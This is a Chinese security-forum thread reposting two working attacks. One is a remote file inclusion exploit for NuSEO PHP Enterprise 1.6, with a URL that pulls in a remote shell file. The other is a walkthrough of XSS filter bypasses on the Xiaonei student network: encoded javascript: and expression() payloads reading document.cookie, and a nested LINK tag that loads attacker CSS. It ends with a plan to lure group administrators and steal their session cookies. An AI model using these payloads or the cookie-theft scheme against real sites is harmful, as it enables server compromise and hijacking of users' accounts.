Board logo

标题: 4nlox [打印本页]

作者: 4nlox    时间: 2011-8-11 21:57     标题: 4nlox

来自QQ:554041204
作者: pow78781    时间: 2011-8-12 18:45

什么情况··
作者: 小象    时间: 2019-10-16 23:20

nuseo php企业版1.6远程文件包含漏洞
Vulnerability Type: Remote File InclusionVulnerable file: /NuSEO PHP Enterprise.v1.6 Nulled by DGT/NuSEO.PHP.Enterprise.v1.6.PHP.NULL-DGT/nuseo/admin/nuseo_admin_d.phpExploit URL: http://localhost/path/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://localhost/shell.txt?Method: getRegister_globals: OnVulnerable variable: nuseo_dirLine number: 268Lines:----------------------------------------------require_once( $nuseo_dir . '/nuseo' . '_d.php' );//nuseo_require_once( $nuseo_config['dir'] . '/admin/nuseo_admin_config_file' );----------------------------------------------GrEeTs To sHaDoW sEcUrItY TeAm & str0keFoUnD By BiNgZaDoRk'SEO by NuSEO.PHP'shadowcrew@hotmail.co.ukshadow.php0h.com


















公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: wlqc    时间: 2019-10-28 23:55

校内网跨站漏洞
文章作者:恶魔傻蛋信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 作为最大的大学生社区网站,校内网对于在校的学生一定耳熟能详吧~ 一日,恶魔傻蛋心仪的女生问我,校内网的涂鸦板页面应该怎么美化呢?对网页制作几乎一窍不通恶魔傻蛋十分无奈了说了声不会,就不了了之(郁闷哇~~55). 事后突然想到校内网的涂鸦板不是可以写HTML的嘛,那弄个JS肯定没问题吧~立马跑去试试了是,结果,校内网很无情的把<script>换成XXXXX> javascript:换成了XXXXXXXXGOOD:(注:校内网将javascript后的":"替换成了"GOOD:"而且在将JAVASCRIPT:分解为每行一个字母后,":"仍然被换成了"good:"),至于java script等等经实验,通通失败~ 呵呵,不甘失败的傻蛋在网上大肆寻找资料,功夫不负有心人,终于找到了一篇极为全面的XSS文章:http://ha.ckers.org/xss.html 经过一个个的实验,最终发现两个可以利用的方式~ 将代码转换为长型的UTF-8 UNICODE代码转换前代码
Copy code
<IMG SRC=JAVASCRIPT:ALERT("HAHA")>转换后代码长型UTF-8 UNICODE代码 成功成功 转换为十进制代码转换前
Copy code
<img STYLE="xss:expr/*XSS*/ession(alert(document.cookie))">转换后
Copy code
<img STYLE="xss:expr/*XSS*/ession(alert(document.cookie))"> 成功~看贴图! 成功 跨站漏洞发现后,无意间在校内网的一个黑客群中发现了一个用CSS执行JS的方法:校内网将<LINK>标签替换成空了,但是可以用<LI<LINK>NK>,过滤了一个<LINK>但是留下了一个LINK.呵呵~
Copy code
<li<link/>nk type="text/css" rel="stylesheet" href="1.css" />看图片:CSS利用 CSS利用成功 另外,校内网的群的公告板里也存在跨站漏洞,可以直接使用<LINK>标签(但是禁用了转换进制后的代码). 直接用这个就OK~
Copy code
<link type="text/css" rel="stylesheet" href="1.css" />群公告CSS利用 校内网跨站利用方法(社会工程学):将获取COOKIE的代码写到自己的涂鸦版中,然后去访问一个人气比较旺的群里面(人多的有数万人哦),访问他的管理员的校内空间留个言,作为礼貌只要你在校内给人留言,别人就会到你的空间回复.嘿嘿,上钩了吧,如果那个管理员不幸在登录的时候选择的自动登录,嘿嘿.~(点自动登录后,校内的帐号及密码都会保存在COOKIE中,密码使用MD5加密的).虽然不一定能搞到密码,但是有了COOKIE,登录玩玩还是没问题滴~~然后,到那个群里面自由发挥吧.哇嘎嘎~~


















公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://www.sitedirsec.com/) Powered by Discuz! 7.2